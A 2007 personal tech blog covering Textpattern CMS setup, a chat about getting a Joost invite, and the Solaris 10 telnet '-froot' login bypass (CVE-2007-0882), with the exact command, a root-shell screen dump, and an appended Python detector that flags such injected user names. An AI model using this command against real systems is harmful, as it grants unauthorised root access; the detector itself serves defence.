Tuesday, May 29, 2007

Textpattern : the CMS

I chose Textpattern for the site GoWayanad.com after comparing various CMSes. I found TXP, aka Textpattern, to be pretty neat and lightweight. It doesn't have all those flashy features other CMSes like Joomla offer. But since the site is going to be static, I won't be needing all those flashy features. And of course, as the number of lines of code increases, the number of bugs also increases.

Anyway, I had to burn high amounts of brain fuel to get used to Textpattern. Getting used to writing articles, the concepts of presentation, content, forms etc. were very confusing in the beginning.

Given below are a few links which gave me the basic understanding of TXP

Then I noticed that Firefox was not auto-detecting the RSS feed. How to make feed aggregators auto-detect the Textpattern RSS feed? I googled and there were no proper results. Anyway, I noted that the directive

<link rel="alternate" type="application/rss+xml" title="rss" href="http://gowayanad.com/index.php?rss=1" />

is missing in the 'head' section. I added it to the head section of the Presentation > Pages page I am using and it started working.

Helpful FAQ : http://textpattern.com/faq/280/troubleshooting-feed-issues

(I will keep updating this blog post with various tips and tricks regarding textpattern. )

Thursday, May 3, 2007

i bend my knees in front of thee and beg for joost invite

Joost is an Internet (P2P) TV application. It's a startup floated by the co-founders of Skype and Kazaa. Following Gmail, they are using an "invitation only" marketing campaign.

And it's very difficult to get an invite. Check the chat I had with a friend ;-)

me: wats ur stat ? ( status in google talk)


galexy: search joost


me: hmmm
invite undel thaaa ;-)
( translates to : please please give me an invite)
i will try
is it good ?

galexy: NO WAY
u have to go down on your knees and beg
me: im doing it
galexy: i am not seeing it :D

desperate me: oh i bend my knees infront of thee and beg for joost.

galexy: :)

ok.. and u shall be called bandipur bayangaran


poor me: as u wish ...
any more wishes ?


galexy: nope
me: then u should act ...

galexy: giving it

Finally my dear friend 'galexy' [g :-) ] sent me a Joost invite and I got the app downloaded. (There is a desktop client which will stream the media from the network. Sadly GNU/Linux is not supported!) But it looks like they haven't added HTTP proxy support. Looks like it's tricky to support proxies as the application uses P2P networks.

The error message I got was quite funny. It said: 'You seem to be connecting internet via something called a "proxy" '

(Well, I hope I could properly configure the NAT at my home and get rid of the Squid proxy - thanks to the sify internet connection(?) I am using)

Tuesday, May 1, 2007

Inbuilt vulnerability support !

I have been thinking about starting a technical blog for quite some time. And I am excited to start by writing about security. From the early days at college, I was told that getting root / administrator is the biggest thing a computer engineer can do, and some of my friends were successful enough to crack a Novell NetWare network and use it for getting some pr0n. Finally one hell of an anti-cracker caught them, 'disassembled and analysed' the whole .EXE file they used to crack the Novell NetWare and suspended them from the lab. (The anti-cracker had used a tool called Turbo Disassembler to do the magic.) Now please don't ask me how he managed to do that. I have been trying to figure that out for years, and once I understand how to do that, I will go to the Himalayas and spend the rest of my life as a sadhu! (some snaps) And then there was another guy who told me that copying and pasting the GNU/Linux boot messages to some file will solve all the X-related issues in RedHat 7.0. (LOL! I hope he will be reading this.)

Ok :-) That's the old story about getting root.

Recently I happened to check a Solaris 10 box. This version of the operating system comes with an interesting zero-day bug.

Try "telnet -l '-froot' IP" and you can login to a Solaris 10 box without a password !

I know, no one is going to believe this. So I have added the screen dump below:


[~]$telnet -l '-froot' IP
Trying IP...
Connected to IP(IP).
Escape character is '^]'.
Last login: Wed Apr 19 00:28:17 from IP
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
# bash



Ok, let's try a cat /etc/release

bash-3.00# cat /etc/re
reboot release remote
bash-3.00# cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006



Still not convinced ?


bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00#


Oh yea !!! You can login without a root password !

btw what is this '-f ' option ?

GNU/Linux man page says "If Kerberos V5 authentication is being used, the -f option allows the local credentials to be forwarded to the remote system."

Details: CVE-2007-0882 (the telnet "-froot" bug)

The Register has an article here

Sun has announced a workaround and a patch for it.
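
For detection, an added example (not part of the original post): the telnet client sends the value given to -l as the USER variable in a NEW-ENVIRON subnegotiation (RFC 1572), so a network sensor can flag any USER value that begins with "-". The function names and the sample byte strings are constructed for illustration, and only option 39 (NEW-ENVIRON) is handled, not the older ENVIRON option.

```python
# Added example. Constants from RFC 854 (telnet) and RFC 1572 (NEW-ENVIRON).
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39
IS, INFO = 0, 2                      # client-to-server subnegotiation commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def _pairs(body):
    """Split 'VAR name VALUE value ...' into (name, value) tuples."""
    fields, k = [], 0                # each field is [marker, bytearray]
    while k < len(body):
        b = body[k]
        if b == ESC and k + 1 < len(body):      # ESC: next byte is literal
            k += 1
            if fields:
                fields[-1][1].append(body[k])
        elif b in (VAR, VALUE, USERVAR):        # marker starts a new field
            fields.append([b, bytearray()])
        elif fields:
            fields[-1][1].append(b)
        k += 1
    for n, (kind, data) in enumerate(fields):
        if kind != VALUE:                       # a name; its value may follow
            nxt = fields[n + 1:n + 2]
            val = nxt[0][1] if nxt and nxt[0][0] == VALUE else bytearray()
            yield data.decode("latin-1"), val.decode("latin-1")

def environ_vars(stream):
    """Yield (name, value) from each NEW-ENVIRON IS/INFO block in a byte stream."""
    pos = 0
    while (start := stream.find(bytes([IAC, SB, NEW_ENVIRON]), pos)) >= 0:
        j, body = start + 3, bytearray()
        while j < len(stream):
            if stream[j] == IAC:
                if stream[j + 1:j + 2] != bytes([IAC]):
                    break                       # IAC SE ends the block
                j += 1                          # IAC IAC is an escaped 0xFF
            body.append(stream[j])
            j += 1
        pos = j + 2
        if body and body[0] in (IS, INFO):
            yield from _pairs(bytes(body[1:]))

def suspicious_users(stream):
    """Return USER values that login would parse as command-line options."""
    return [v for n, v in environ_vars(stream) if n == "USER" and v.startswith("-")]

def _sb(pairs):                      # build a constructed sample subnegotiation
    body = b"".join(bytes([VAR]) + n + bytes([VALUE]) + v for n, v in pairs)
    return bytes([IAC, SB, NEW_ENVIRON, IS]) + body + bytes([IAC, SE])

BENIGN = _sb([(b"USER", b"alice"), (b"DISPLAY", b"host:0")])   # constructed
FLAGGED = _sb([(b"USER", b"-froot")])                          # constructed
```

The same leading "-" test is the server-side fix in miniature: a daemon that hands the client-supplied user name to login should reject such names or pass them after a "--" separator.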